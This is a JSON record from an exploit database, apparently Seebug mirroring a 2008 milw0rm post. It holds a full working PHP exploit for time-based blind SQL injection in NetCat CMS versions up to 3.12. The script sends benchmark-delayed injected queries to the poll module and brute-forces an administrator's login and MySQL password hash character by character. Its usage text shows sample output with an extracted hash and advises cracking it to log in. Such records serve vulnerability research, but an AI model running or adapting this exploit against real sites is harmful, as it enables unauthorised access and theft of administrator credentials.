{"sourceData": "\n <?\n\n/*\n\tAIST NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]\n\tVersions affected <= 3.12\n\n\tMore info: http://www.netcat.ru/\n\n\t* tested on version 3.0, 3.12\n\n\tusage: \n\n\t# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID\n\n\tThe options are required:\n\t -u The user identifier (number in table)\n\t -s Target for exploiting\n\n\texample:\n\n\t# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2\n\n\t[+] Phase 1 brute login.\n\t[+] Brute 1 symbol...\n\t...........a\n\t[+] Brute 2 symbol...\n\t..............d\n\t[+] Brute 3 symbol...\n\t.......................m\n\t[+] Brute 4 symbol...\n\t...................i\n\t[+] Brute 5 symbol...\n\t........................n\n\t[+] Brute 6 symbol...\n\t.....................................\n\t[+] Phase 1 successfully finished: admin\n\t[+] Phase 2 brute password-hash.\n\t[+] Brute 1 symbol...\n\t*\n\t[+] Brute 2 symbol...\n\t.0\n\t[+] Brute 3 symbol...\n\t.0\n\t[+] Brute N symbol...\n\t\n\t<...>\n\t\n\t[+] Brute 42 symbol...\n\t.....................................\n\t[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9\n\t\n\t\n\t[+] Exploiting is finished successfully\n\t[+] Login - admin\n\t[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9\n\t[+] Decrypt MySQL hash and login into NetCat CMS.\n\n*/\n\n\nfunction http_connect($query)\n{\n\n\tglobal $server;\n\n\t$headers = array(\n\t 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',\n\t 'Referer' => $server\n\t);\n\n\t$res_http = new HttpRequest($server."modules/poll/?cc=62&PollID=1".$query, HttpRequest::METH_GET);\n\t$res_http->addHeaders($headers);\n\n\t$t = mktime();\n\ttry {\n\t\t$response = $res_http->send()->getBody();\n\n\t\t$t = mktime() - $t;\n\n\t\tif ($t > 4)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t} catch (HttpException $exception) {\n\n\t\tprint "[-] Not 
connected";\n\t\texit(0);\n\n\t}\n\n}\n\nfunction brute($User_id,$table)\n{\n\t$ret_str = "";\n\n\tif ($table == "Password")\n\t{\n\t\t$b_str = "*1234567890abcdef";\n\t}\n\telse\n\t{\n\t\t$b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\\]^{|}~\u00c3\u00a0\u00c3\u00a1\u00c3\u00a2\u00c3\u00a3\u00c3\u00a4\u00c3\u00a5\u00c3\u00a6\u00c3\u00a7\u00c3\u00a8\u00c3\u00a9\u00c3\u00aa\u00c3\u00ab\u00c3\u00ac\u00c3\u00ad\u00c3\u00ae\u00c3\u00af\u00c3\u00b0\u00c3\u00b1\u00c3\u00b2\u00c3\u00b3\u00c3\u00b4\u00c3\u00b5\u00c3\u00b6\u00c3\u00b7\u00c3\u00b8\u00c3\u00b9\u00c3\u00ba\u00c3\u00bb\u00c3\u00bc\u00c3\u00bd\u00c3\u00be\u00c3\u00bf\u00c5\u00be";\n\t}\n\n\t$b_arr = str_split($b_str);\n\n\tfor ($i=1;$i<43;$i++)\n\t{\n\t\tprint "[+] Brute $i symbol...\\n";\n\n\t\tfor ($j=0;$j<count($b_arr);$j++)\n\t\t{\n\t\t\t$brute = ord($b_arr[$j]);\n\t\t\t$q = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$brute,benchmark(1,benchmark(2000000,md5(now()))),0)";\n\n\t\t\tif (http_connect($q))\n\t\t\t{\n\t\t\t\t$ret_str=$ret_str.$b_arr[$j];\n\t\t\t\tprint $b_arr[$j]."\\n";\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tprint ".";\n\n\n\t\t}\n\n\t\tif ($j == count($b_arr)) break;\n\t}\n\n\treturn $ret_str;\n}\n\n\nfunction help_argc($script_name)\n{\nprint "\nusage:\n\n# ./".$script_name." -s=NetCat_server -u=User_ID\n\nThe options are required:\n -u The user identifier (number in table)\n -s Target for exploiting\n\nexample:\n\n# ./".$script_name." 
-s=http://localhost/netcat/ -u=1\n[+] Phase 1 brute login.\n[+] Brute 1 symbol...\n..1\n[+] Brute 2 symbol...\n.....................................\n[+] Phase 1 successfully finished: 1\n[+] Phase 2 brute password-hash.\n[+] Brute 1 symbol...\n.....................................\n[+] Phase 2 successfully finished:\n\n\n[+] Exploiting is finished successfully\n[+] Login - 1\n[+] MySQL hash -\n[+] You can login into NetCat CMS with the empty password\n";\n}\n\nfunction successfully($login,$hash)\n{\nprint "\n\n[+] Exploiting is finished successfully\n[+] Login - $login\n[+] MySQL hash - $hash\n";\n\nif ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\\n";\nelse print "[+] You can login into NetCat CMS with the empty password\\n";\n\n}\n\nif (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))\n{\n\thelp_argc($argv[0]);\n\texit(0);\n}\nelse\n{\n\t$ARG = array(); \n\tforeach ($argv as $arg) { \n\t\tif (strpos($arg, '-') === 0) { \n\t\t\t$key = substr($arg,1,1);\n\t\t\tif (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); \n\t\t} \n\t}\n\n\tif ($ARG[s] && $ARG[u])\n\t{\n\t\t$server = $ARG[s];\n\t\t$User_id = intval($ARG[u]);\n\t\t$User_id--;\n\n\t\tprint "[+] Phase 1 brute login.\\n";\n\t\t$login = brute($User_id,"Login");\n\t\tprint "\\n[+] Phase 1 successfully finished: $login\\n";\n\n\t\tprint "[+] Phase 2 brute password-hash.\\n";\n\t\t$hash = brute($User_id,"Password");\n\t\tprint "\\n[+] Phase 2 successfully finished: $hash\\n";\n\n\t\tsuccessfully($login,$hash);\n\t}\n\telse\n\t{\n\t\thelp_argc($argv[0]);\n\t\texit(0);\n\t}\n\n}\n\n?> \n\n# milw0rm.com [2008-12-29]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17678", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-17678", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T19:04:30", "published": "2008-12-29T00:00:00", "cvelist": [], "id": 
"SSV:17678", "enchantments_done": [], "modified": "2008-12-29T00:00:00", "title": "CMS NetCat 3.0/3.12 Blind SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645461863}}
{}